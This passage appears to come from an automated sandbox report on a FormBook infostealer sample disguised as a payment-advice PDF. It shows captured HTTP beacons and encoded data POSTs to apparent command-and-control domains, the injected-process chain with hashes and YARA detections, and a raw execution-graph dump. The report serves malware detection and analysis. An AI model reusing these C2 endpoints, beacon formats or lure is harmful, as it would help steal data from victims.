                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 796
                                                            date: Thu, 05 Dec 2024 18:41:39 GMT
                                                            server: LiteSpeed
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                            Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                            21         | 192.168.2.7 | 49992       | 104.21.62.184  | 80               | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp                          | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:41:44.915376902 CET | 820               | OUT       | POST /ipd6/ HTTP/1.1
                                                            Host: www.questmatch.pro
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 217
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.questmatch.pro
                                                            Referer: http://www.questmatch.pro/ipd6/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Ascii: wVb0=BC3Wr1zDDmuZUZdYfCATWchzJXqJt7DEdsKOqxd54GwZUseV4rBqARUwbb93fEkwnDUY1112qX2WBrAWgOK8mM9SmzogxrDIQLLttTlO7P9g0SrdxTWSLI1fXT4jL7YrjrRsviYEjU9noWudydBeBcXeoA6vInturJMKQ8TiR8wXyWagyve8hvCXye9LjnYgHvOA23DEVMuBvvcAmQ==
                                                            Dec 5, 2024 19:41:46.204044104 CET | 1236 | IN | HTTP/1.1 404
                                                            Date: Thu, 05 Dec 2024 18:41:46 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Origin
                                                            Vary: Access-Control-Request-Method
                                                            Vary: Access-Control-Request-Headers
                                                            X-Correlation-ID: d1bf3981-20e3-47b8-818d-c35a17b0269c
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: 0
                                                            CF-Connecting-IP: 8.46.123.228
                                                            CF-IPCountry: US
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q8zXxzXchGqnNW0wOPxZfLMoEaYWYIlQ9bKgh7d5d4iuNYHUf83MCRwV5LaTFyiAk46T6L%2FqupMMWJJmHWk2WJia5j4pvrq0ok9jkAagbSwxv6wCn%2Fb8P2Mclfn2tl5LPzSy96o%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ed62c157b9e8ca2-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2009&min_rtt=2009&rtt_var=1004&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=820&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data: [gzip-compressed chunked body, binary dump omitted]
                                                            Dec 5, 2024 19:41:46.204348087 CET | 103 | IN | Data: [continuation of gzip-compressed body, binary dump omitted]


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            22 | 192.168.2.7 | 49993 | 104.21.62.184 | 80 | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:41:47.574449062 CET | 840 | OUT | POST /ipd6/ HTTP/1.1
                                                            Host: www.questmatch.pro
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 237
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.questmatch.pro
                                                            Referer: http://www.questmatch.pro/ipd6/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Ascii: wVb0=BC3Wr1zDDmuZV5NYehYTechyKXqJ0LDAdt2Oqzxp4ycZauGV5qBqMxUwV79vCUk7nEcq11J2qXyWBvEWh/K9gc9QuTois7DIQLLttTxk7PVg0Cbdw26VCo1YQT4jP7ZijrRevjFpjXVnoTSdrsBdIcXYsA66EWQnprEFJNfWT8sW3gbCoNSQ/+6s2cZ90BFVFuKY7V3lK7Lri99Ewp83r8TOr2EOvy0IAwMUpCw=
                                                            Dec 5, 2024 19:41:48.859019041 CET | 1236 | IN | HTTP/1.1 404
                                                            Date: Thu, 05 Dec 2024 18:41:48 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Origin
                                                            Vary: Access-Control-Request-Method
                                                            Vary: Access-Control-Request-Headers
                                                            X-Correlation-ID: 942ad7a6-277e-4b9d-9849-84d6715cdbc1
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: 0
                                                            CF-Connecting-IP: 8.46.123.228
                                                            CF-IPCountry: US
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ujobnjQSCeLgp30KCK9GJt%2F6uzemBLxgwPWkO6oT0Np7Hm0iT9tJ3P7bgFCmrPsPoa904zxqURthM%2FH%2B2A6wd13C7w1O7eLLqfP7Pk3xLaXRY%2B7R9CG%2FkpQB2fr7BRppOQjJR3w%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ed62c261ad27cf0-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1819&rtt_var=909&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=840&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data: [gzip-compressed chunked body, binary dump omitted]
                                                            Dec 5, 2024 19:41:48.859036922 CET | 108 | IN | Data: [continuation of gzip-compressed body, binary dump omitted]


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            23 | 192.168.2.7 | 49994 | 104.21.62.184 | 80 | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:41:50.233740091 CET | 1853 | OUT | POST /ipd6/ HTTP/1.1
                                                            Host: www.questmatch.pro
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 1249
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.questmatch.pro
                                                            Referer: http://www.questmatch.pro/ipd6/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Dec 5, 2024 19:41:51.521243095 CET | 1236 | IN | HTTP/1.1 404
                                                            Date: Thu, 05 Dec 2024 18:41:51 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Origin
                                                            Vary: Access-Control-Request-Method
                                                            Vary: Access-Control-Request-Headers
                                                            X-Correlation-ID: 00ae388a-b313-47ca-9a23-b83dba651db1
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: 0
                                                            CF-Connecting-IP: 8.46.123.228
                                                            CF-IPCountry: US
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M9aJFqSdbRVOaOfHuCdgCn8hHQnO0xiiItL%2BLmjvtjqqzKaXT0Lp5dPslKDgAqIMKKxK4kSlYLuZLBbRRgbKxSq%2FMz7I673T5EySPH%2F%2B82RNrsFJkc0%2Fl7um%2FfCmXu09y3WkkCE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ed62c36b8cc8cc3-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1861&min_rtt=1861&rtt_var=930&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1853&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data: [gzip-compressed chunked body, binary dump omitted]
                                                            Dec 5, 2024 19:41:51.521261930 CET | 111 | IN | Data: [continuation of gzip-compressed body, binary dump omitted]


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            24 | 192.168.2.7 | 49995 | 104.21.62.184 | 80 | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:41:52.899048090 CET | 551 | OUT | GET /ipd6/?wVb0=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5tpttEQTjebBZLDP1C5B1+B2izjL5y+kFvtZcDEbY8V81qhugw9f9kl5&0r=XzjtrBPP HTTP/1.1
                                                            Host: www.questmatch.pro
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Dec 5, 2024 19:41:54.185230017 CET | 1236 | IN | HTTP/1.1 404
                                                            Date: Thu, 05 Dec 2024 18:41:54 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Origin
                                                            Vary: Access-Control-Request-Method
                                                            Vary: Access-Control-Request-Headers
                                                            X-Correlation-ID: b04cb7ed-e20f-48f9-a1b8-f817ed11d619
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: 0
                                                            CF-Connecting-IP: 8.46.123.228
                                                            CF-IPCountry: US
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=16mUn%2BnQ6z85E4qTw4H8mvkkDrJJqimcJzkNONcb%2Ba%2Bxhy0JLQ4%2Br%2BuTz5ofuarjhrkZIqPdZLMAmHQMZ2HeXRhYGpZwTpx5371JJbwVm2r37tqeIEFuKTZVSpzstHe05m%2BA2OE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ed62c4769ba42b8-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1767&rtt_var=883&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=551&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Ascii: bb{"body":null,"errors":{"code":404,"name":"Not Found","details":["No handler found for GET /ipd6/"]},"d
                                                            Dec 5, 2024 19:41:54.185266972 CET | 92 | IN | Data Ascii: ebugInfo":{"correlationId":"b04cb7ed-e20f-48f9-a1b8-f817ed11d619","stackTrace":null}}0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            25 | 192.168.2.7 | 49996 | 66.29.137.10 | 80 | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:41:59.925052881 CET | 814 | OUT | POST /hayl/ HTTP/1.1
                                                            Host: www.callyur.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 217
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.callyur.shop
                                                            Referer: http://www.callyur.shop/hayl/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Ascii: wVb0=2soVY/BCKwRxo6R7kG1fWS8XSh1kaxDhVexrTWGIROVxsaBrkMyKS7CCMI/1qTBL50BNme/3l0VHxWIp/VEufDBs75ai8rOXAqCIgaBw1eCv2y9A41Vfx06QwiAbpxzHEbj6uOUpGcqjrUk/gYiszjd8D5cYX6udedY5cRsw8YcjTOw5Lfh1W78sl6QfCt1WOZYS5bDcxHv8/mWHhQ==
                                                            Dec 5, 2024 19:42:01.171619892 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            keep-alive: timeout=5, max=100
                                                            content-type: text/html
                                                            transfer-encoding: chunked
                                                            content-encoding: gzip
                                                            vary: Accept-Encoding
                                                            date: Thu, 05 Dec 2024 18:42:00 GMT
                                                            server: LiteSpeed
                                                            x-turbo-charged-by: LiteSpeed
                                                            connection: close
                                                            Data: [gzip-compressed chunked HTML body, binary dump omitted]
                                                            Dec 5, 2024 19:42:01.171672106 CET | 1236 | IN | Data: [continuation of gzip-compressed body, binary dump omitted]
                                                            Dec 5, 2024 19:42:01.171684027 CET | 1236 | IN | Data: [continuation of gzip-compressed body, binary dump omitted]
                                                            Dec 5, 2024 19:42:01.171926022 CET | 672 | IN | Data: [continuation of gzip-compressed body, binary dump omitted]
                                                            Dec 5, 2024 19:42:01.171941042 CET | 852 | IN | Data: [continuation of gzip-compressed body, binary dump omitted]


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            26 | 192.168.2.7 | 49997 | 66.29.137.10 | 80 | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:42:02.592125893 CET | 834 | OUT | POST /hayl/ HTTP/1.1
                                                            Host: www.callyur.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 237
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.callyur.shop
                                                            Referer: http://www.callyur.shop/hayl/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Ascii: wVb0=2soVY/BCKwRxoah7lhZfeS8UdB1kDBD9Ve1rTXDVR4Fxs4ZrlIGKT7CCUY/w3jBE50FFmaj3lw1HxUgp+iotfTBuyZagibOXAqCIgaFe1eav3G5AqEVc3E6fnSAbiRyOEbjcuPIXGZ2jrWs/gqKv6jc3OZdLUo/QRv0BEj8a+q4JW4xbR9tZIqEXh40pVLojMYcK0539uwKWy03D3oBcPbn+G82VkVdcIqpfNy4=
                                                            Dec 5, 2024 19:42:03.802515030 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            keep-alive: timeout=5, max=100
                                                            content-type: text/html
                                                            transfer-encoding: chunked
                                                            content-encoding: gzip
                                                            vary: Accept-Encoding
                                                            date: Thu, 05 Dec 2024 18:42:03 GMT
                                                            server: LiteSpeed
                                                            x-turbo-charged-by: LiteSpeed
                                                            connection: close



                                                            Target ID:0
                                                            Start time:13:38:57
                                                            Start date:05/12/2024
                                                            Path:C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe"
                                                            Imagebase:0x840000
                                                            File size:1'226'752 bytes
                                                            MD5 hash:C05461F24E430ECAF9B9106DE5CAFA70
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:13:39:01
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe"
                                                            Imagebase:0xbc0000
                                                            File size:46'504 bytes
                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1448964274.0000000006B20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1445662194.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1446968619.0000000004FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:13:39:10
                                                            Start date:05/12/2024
                                                            Path:C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe"
                                                            Imagebase:0xbc0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3093757528.00000000041C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:11
                                                            Start time:13:39:11
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\SysWOW64\rasautou.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\rasautou.exe"
                                                            Imagebase:0x770000
                                                            File size:15'360 bytes
                                                            MD5 hash:DFDBEDC2ED47CBABC13CCC64E97868F3
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3091105288.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3093726218.0000000004730000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3093625342.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            Target ID:13
                                                            Start time:15:29:27
                                                            Start date:05/12/2024
                                                            Path:C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe"
                                                            Imagebase:0xbc0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3096255257.0000000005030000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:15
                                                            Start time:15:29:40
                                                            Start date:05/12/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff722870000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:3.4%
                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                              Signature Coverage:8.9%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:68
calls 104972->104973 104974 847a3b 104973->104974 104975 848029 59 API calls 104974->104975 104976 847a4a 104975->104976 104976->104960 104977->104960 104978->104960 104979->104950 104980->104960 104981->104960 104983 860db6 Mailbox 59 API calls 104982->104983 104984 848033 104983->104984 104984->104966 104985->104959 104986->104962 104987->104950 104989 8653b2 __lseeki64 104988->104989 104990 8653c6 104989->104990 104991 8653de 104989->104991 105023 868b28 58 API calls __getptd_noexit 104990->105023 104998 8653d6 __lseeki64 104991->104998 105001 866c11 104991->105001 104993 8653cb 105024 868db6 9 API calls __lseeki64 104993->105024 104998->104858 105002 866c43 EnterCriticalSection 105001->105002 105003 866c21 105001->105003 105005 8653f0 105002->105005 105003->105002 105004 866c29 105003->105004 105006 869c0b __lock 58 API calls 105004->105006 105007 86533a 105005->105007 105006->105005 105008 86535d 105007->105008 105009 865349 105007->105009 105016 865359 105008->105016 105026 864a3d 105008->105026 105069 868b28 58 API calls __getptd_noexit 105009->105069 105011 86534e 105070 868db6 9 API calls __lseeki64 105011->105070 105025 865415 LeaveCriticalSection LeaveCriticalSection _fseek 105016->105025 105019 865377 105043 870a02 105019->105043 105021 86537d 105021->105016 105022 862d55 _free 58 API calls 105021->105022 105022->105016 105023->104993 105024->104998 105025->104998 105027 864a50 105026->105027 105028 864a74 105026->105028 105027->105028 105029 8646e6 __flush 58 API calls 105027->105029 105032 870b77 105028->105032 105030 864a6d 105029->105030 105071 86d886 105030->105071 105033 870b84 105032->105033 105035 865371 105032->105035 105034 862d55 _free 58 API calls 105033->105034 105033->105035 105034->105035 105036 8646e6 105035->105036 105037 864705 105036->105037 105038 8646f0 105036->105038 105037->105019 105213 868b28 58 API calls __getptd_noexit 105038->105213 105040 8646f5 105214 868db6 9 API calls __lseeki64 105040->105214 105042 864700 105042->105019 
105044 870a0e __lseeki64 105043->105044 105045 870a32 105044->105045 105046 870a1b 105044->105046 105047 870abd 105045->105047 105049 870a42 105045->105049 105230 868af4 58 API calls __getptd_noexit 105046->105230 105235 868af4 58 API calls __getptd_noexit 105047->105235 105052 870a60 105049->105052 105053 870a6a 105049->105053 105051 870a20 105231 868b28 58 API calls __getptd_noexit 105051->105231 105232 868af4 58 API calls __getptd_noexit 105052->105232 105057 86d206 ___lock_fhandle 59 API calls 105053->105057 105054 870a65 105236 868b28 58 API calls __getptd_noexit 105054->105236 105059 870a70 105057->105059 105061 870a83 105059->105061 105062 870a8e 105059->105062 105060 870ac9 105237 868db6 9 API calls __lseeki64 105060->105237 105215 870add 105061->105215 105233 868b28 58 API calls __getptd_noexit 105062->105233 105065 870a27 __lseeki64 105065->105021 105067 870a89 105234 870ab5 LeaveCriticalSection __unlock_fhandle 105067->105234 105069->105011 105070->105016 105072 86d892 __lseeki64 105071->105072 105073 86d8b6 105072->105073 105074 86d89f 105072->105074 105076 86d955 105073->105076 105079 86d8ca 105073->105079 105172 868af4 58 API calls __getptd_noexit 105074->105172 105178 868af4 58 API calls __getptd_noexit 105076->105178 105078 86d8a4 105173 868b28 58 API calls __getptd_noexit 105078->105173 105082 86d8f2 105079->105082 105083 86d8e8 105079->105083 105080 86d8ed 105179 868b28 58 API calls __getptd_noexit 105080->105179 105099 86d206 105082->105099 105174 868af4 58 API calls __getptd_noexit 105083->105174 105087 86d8f8 105089 86d91e 105087->105089 105090 86d90b 105087->105090 105088 86d961 105180 868db6 9 API calls __lseeki64 105088->105180 105175 868b28 58 API calls __getptd_noexit 105089->105175 105108 86d975 105090->105108 105094 86d8ab __lseeki64 105094->105028 105095 86d917 105177 86d94d LeaveCriticalSection __unlock_fhandle 105095->105177 105096 86d923 105176 868af4 58 API calls __getptd_noexit 105096->105176 105100 86d212 __lseeki64 105099->105100 
105101 86d261 EnterCriticalSection 105100->105101 105103 869c0b __lock 58 API calls 105100->105103 105102 86d287 __lseeki64 105101->105102 105102->105087 105104 86d237 105103->105104 105105 86d24f 105104->105105 105181 869e2b InitializeCriticalSectionAndSpinCount 105104->105181 105182 86d28b LeaveCriticalSection _doexit 105105->105182 105109 86d982 __ftell_nolock 105108->105109 105110 86d9e0 105109->105110 105111 86d9c1 105109->105111 105142 86d9b6 105109->105142 105116 86da38 105110->105116 105117 86da1c 105110->105117 105192 868af4 58 API calls __getptd_noexit 105111->105192 105114 86e1d6 105114->105095 105115 86d9c6 105193 868b28 58 API calls __getptd_noexit 105115->105193 105119 86da51 105116->105119 105198 8718c1 60 API calls 3 library calls 105116->105198 105195 868af4 58 API calls __getptd_noexit 105117->105195 105183 875c6b 105119->105183 105121 86da21 105196 868b28 58 API calls __getptd_noexit 105121->105196 105122 86d9cd 105194 868db6 9 API calls __lseeki64 105122->105194 105127 86da5f 105129 86ddb8 105127->105129 105199 8699ac 58 API calls 2 library calls 105127->105199 105128 86da28 105197 868db6 9 API calls __lseeki64 105128->105197 105130 86ddd6 105129->105130 105131 86e14b WriteFile 105129->105131 105133 86defa 105130->105133 105140 86ddec 105130->105140 105134 86ddab GetLastError 105131->105134 105144 86dd78 105131->105144 105145 86dfef 105133->105145 105147 86df05 105133->105147 105134->105144 105136 86da8b GetConsoleMode 105136->105129 105138 86daca 105136->105138 105137 86e184 105137->105142 105204 868b28 58 API calls __getptd_noexit 105137->105204 105138->105129 105139 86dada GetConsoleCP 105138->105139 105139->105137 105167 86db09 105139->105167 105140->105137 105141 86de5b WriteFile 105140->105141 105141->105134 105146 86de98 105141->105146 105206 86c5f6 105142->105206 105144->105137 105144->105142 105149 86ded8 105144->105149 105145->105137 105150 86e064 WideCharToMultiByte 105145->105150 105146->105140 105151 86debc 105146->105151 
